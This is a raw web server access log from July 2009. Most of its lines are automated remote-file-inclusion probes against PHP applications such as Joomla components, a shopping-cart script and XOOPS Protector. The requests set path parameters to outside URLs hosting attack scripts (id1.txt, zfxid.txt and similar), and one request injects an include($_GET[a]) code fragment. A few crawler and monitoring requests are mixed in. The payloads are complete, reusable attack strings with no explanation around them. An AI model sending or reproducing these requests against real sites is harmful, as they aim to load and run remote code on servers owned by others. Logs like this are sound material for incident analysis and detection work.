63.147.72.145 - - [26/Jul/2009:01:52:11 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:01:52:11 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:01:52:11 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:01:52:16 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:01:52:16 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:01:52:16 -0400] "GET /logs/access_log.Q109061000%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:01:52:16 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 200 11071 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:01:52:16 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:01:52:16 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:01:52:17 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:01:52:23 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:01:52:38 -0400] "GET /logs/access_log.Q109052400%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:01:52:47 -0400] "GET /logs/access_log.Q109052400%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:52:49 -0400] "GET /logs/error_log.Q109052300%20%20//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:01:52:50 -0400] "GET /logs/access_log.Q109052400%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:52:50 -0400] "GET /logs/access_log.Q109052500%20%20//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:01:52:57 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:01:52:57 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:01:52:57 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:01:53:01 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:01:53:01 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:01:53:01 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:01:53:02 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:53:08 -0400] "GET /logs/error_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:53:08 -0400] "GET /logs/access_log.Q109061800%20%20//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:53:08 -0400] "GET /logs/error_log.Q109061800%20%20//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:01:53:41 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:01:53:41 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:01:53:41 -0400] "GET //index.php?DOCUMENT_ROOT=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:01:53:41 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:01:53:47 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:01:53:47 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:01:53:47 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:01:53:57 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:01:54:25 -0400] "GET /logs/access_log.Q109060100%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:01:54:33 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:54:36 -0400] "GET /logs/error_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:54:39 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
124.0.146.100 - - [26/Jul/2009:01:55:58 -0400] "GET /logs/access_log.Q109070700%20%20///administrator/components/com_moofaq/css/file_includer.php?file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
124.0.146.100 - - [26/Jul/2009:01:55:58 -0400] "GET /logs///administrator/components/com_moofaq/css/file_includer.php?file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
124.0.146.100 - - [26/Jul/2009:01:55:58 -0400] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:01:56:06 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:01:56:06 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
131.203.76.246 - - [26/Jul/2009:01:56:37 -0400] "GET /logs/access_log.Q109060800%20%20///www.acordinternational.org/index.php?module=search&q=jobs/index.php?option=com_letterman//index.php?option=http://aboutav.com//id1.txt????? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
131.203.76.246 - - [26/Jul/2009:01:56:37 -0400] "GET ///www.acordinternational.org/index.php?module=search&q=jobs/index.php?option=com_letterman//index.php?option=http://aboutav.com//id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
131.203.76.246 - - [26/Jul/2009:01:56:37 -0400] "GET /logs/access_log.Q109060800///www.acordinternational.org/index.php?module=search&q=jobs/index.php?option=com_letterman//index.php?option=http://aboutav.com//id1.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
131.203.76.246 - - [26/Jul/2009:01:56:37 -0400] "GET /logs///www.acordinternational.org/index.php?module=search&q=jobs/index.php?option=com_letterman//index.php?option=http://aboutav.com//id1.txt????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
131.203.76.246 - - [26/Jul/2009:01:56:37 -0400] "GET /logs///www.acordinternational.org/index.php?module=search&q=jobs/index.php?option=com_letterman//index.php?option=http://aboutav.com//id1.txt????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
131.203.76.246 - - [26/Jul/2009:01:56:37 -0400] "GET ///www.acordinternational.org/index.php?module=search&q=jobs/index.php?option=com_letterman//index.php?option=http://aboutav.com//id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.6.22.169 - - [26/Jul/2009:01:56:14 -0400] "GET /logs/access_log.Q109072300 HTTP/1.0" 200 5083465 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.68.247 - - [26/Jul/2009:01:56:45 -0400] "GET /images/_notes/nav_store_index_off.jpg.mno HTTP/1.1" 200 254 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
131.203.76.246 - - [26/Jul/2009:01:56:51 -0400] "GET /logs/access_log.Q109061100%20%20///www.acordinternational.org/index.php?module=search&q=jobs/index.php?option=com_letterman//index.php?option=http://aboutav.com//id1.txt????? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
131.203.76.246 - - [26/Jul/2009:01:56:59 -0400] "GET /logs/access_log.Q109061100///www.acordinternational.org/index.php?module=search&q=jobs/index.php?option=com_letterman//index.php?option=http://aboutav.com//id1.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:01:57:10 -0400] "GET /logs//core.php?board=weiquan&act=view&no=9&page=1&search_mode=&search_word=&cid=/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:01:57:10 -0400] "GET //core.php?board=weiquan&act=view&no=9&page=1&search_mode=&search_word=&cid=/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:01:57:10 -0400] "GET /logs/access_log.Q109070400%20%20//core.php?board=weiquan&act=view&no=9&page=1&search_mode=&search_word=&cid=/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:57:13 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:57:13 -0400] "GET /logs/error_log.Q109070800%20%20//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:57:13 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:01:57:21 -0400] "GET /logs/error_log.Q109070400%20%20//core.php?board=weiquan&act=view&no=9&page=1&search_mode=&search_word=&cid=/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.146.100 - - [26/Jul/2009:01:57:24 -0400] "GET /logs/access_log.Q109062200%20%20///administrator/components/com_moofaq/css/file_includer.php?file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
124.0.146.100 - - [26/Jul/2009:01:57:24 -0400] "GET /logs/error_log.Q109070700%20%20///administrator/components/com_moofaq/css/file_includer.php?file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
131.203.76.246 - - [26/Jul/2009:01:57:30 -0400] "GET ///www.acordinternational.org/index.php?module=search&q=jobs/index.php?option=com_letterman//index.php?option=http://aboutav.com//id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
131.203.76.246 - - [26/Jul/2009:01:57:30 -0400] "GET /logs///www.acordinternational.org/index.php?module=search&q=jobs/index.php?option=com_letterman//index.php?option=http://aboutav.com//id1.txt????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
131.203.76.246 - - [26/Jul/2009:01:57:30 -0400] "GET /logs/access_log.Q109060800%20%20///www.acordinternational.org/index.php?module=search&q=jobs/index.php?option=com_letterman//index.php?option=http://aboutav.com//id1.txt????? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
131.203.76.246 - - [26/Jul/2009:01:57:41 -0400] "GET /logs/access_log.Q109061100%20%20///www.acordinternational.org/index.php?module=search&q=jobs/index.php?option=com_letterman//index.php?option=http://aboutav.com//id1.txt????? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
124.0.146.100 - - [26/Jul/2009:01:59:32 -0400] "GET /logs/error_log.Q109062200%20%20///administrator/components/com_moofaq/css/file_includer.php?file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:02:00:08 -0400] "GET /logs/access_log.Q109070400//core.php?board=weiquan&act=view&no=9&page=1&search_mode=&search_word=&cid=/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:02:00:09 -0400] "GET /logs/error_log.Q109070400//core.php?board=weiquan&act=view&no=9&page=1&search_mode=&search_word=&cid=/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:02:00:15 -0400] "GET /logs/error_log.Q109052300%20%20//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:02:00:21 -0400] "GET /logs/access_log.Q109052500%20%20//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:00:30 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:00:30 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:00:30 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:00:35 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:02:00:36 -0400] "GET /logs/error_log.Q109061800%20%20//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:02:00:36 -0400] "GET /logs/error_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:02:00:40 -0400] "GET /logs/access_log.Q109061800%20%20//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:02:00:46 -0400] "GET /logs/error_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:02:00:47 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:02:01:17 -0400] "GET /logs/access_log.Q109061000//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:02:01:25 -0400] "GET /logs/access_log.Q109052400//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:02:01:27 -0400] "GET /logs/access_log.Q109061000//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:02:01:34 -0400] "GET /logs/access_log.Q109052400//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:02:01:35 -0400] "GET /logs/access_log.Q109052400//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:02:01:39 -0400] "GET /logs/access_log.Q109061700//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
124.0.146.100 - - [26/Jul/2009:02:01:39 -0400] "GET /logs/access_log.Q109070700///administrator/components/com_moofaq/css/file_includer.php?file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:02:01:41 -0400] "GET /logs/access_log.Q109061700//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
124.0.146.100 - - [26/Jul/2009:02:01:44 -0400] "GET /logs/access_log.Q109062200///administrator/components/com_moofaq/css/file_includer.php?file=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:01:50 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:01:51 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:02:03:21 -0400] "GET /images/_notes/nav_store_fav_over_r1_c5.jpg.mno HTTP/1.1" 200 211 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [26/Jul/2009:02:05:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.129.7 - - [26/Jul/2009:02:07:22 -0400] "GET /logs/access_log.Q109051800//index.php?_SERVER[DOCUMENT_ROOT]=http://shalomchair.com/log.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
121.78.129.7 - - [26/Jul/2009:02:07:23 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://shalomchair.com/log.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
121.78.129.7 - - [26/Jul/2009:02:07:23 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://shalomchair.com/log.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
122.99.196.136 - - [26/Jul/2009:02:07:40 -0400] "GET /logs/access_log.Q109050900//index.php?sourcedir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:02:07:57 -0400] "GET /logs/error_log.Q109050900//index.php?sourcedir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:02:08:18 -0400] "GET /logs/access_log.Q109050900//index.php?sourcedir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:02:08:18 -0400] "GET /logs/error_log.Q109050900//index.php?sourcedir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:02:09:56 -0400] "GET /images/_notes/ace_bkgrd_wide_r3_c3.jpg.mno HTTP/1.1" 200 266 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.22.169 - - [26/Jul/2009:02:09:57 -0400] "GET /logs/access_log.Q109060700 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [26/Jul/2009:02:10:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.20.186.139 - - [26/Jul/2009:02:11:43 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:11:43 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:11:43 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:11:44 -0400] "GET /index2.php?x=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:11:45 -0400] "GET /logs/index2.php?x=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:11:45 -0400] "GET /logs/access_log.Q109051500%20%20/index2.php?x=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:02:12:18 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L302C093D0581F60077A0007+WSEQ(S0060):1+OUITEM(A0200):0034215 HTTP/1.1" 200 27010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
125.248.88.155 - - [26/Jul/2009:02:13:00 -0400] "GET /logs//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:02:13:00 -0400] "GET //modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:02:13:00 -0400] "GET /logs/access_log.Q109063000//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:02:13:20 -0400] "GET /logs/access_log.Q109061100//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:13:37 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:14:43 -0400] "GET /logs/access_log.Q109051500/index2.php?x=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
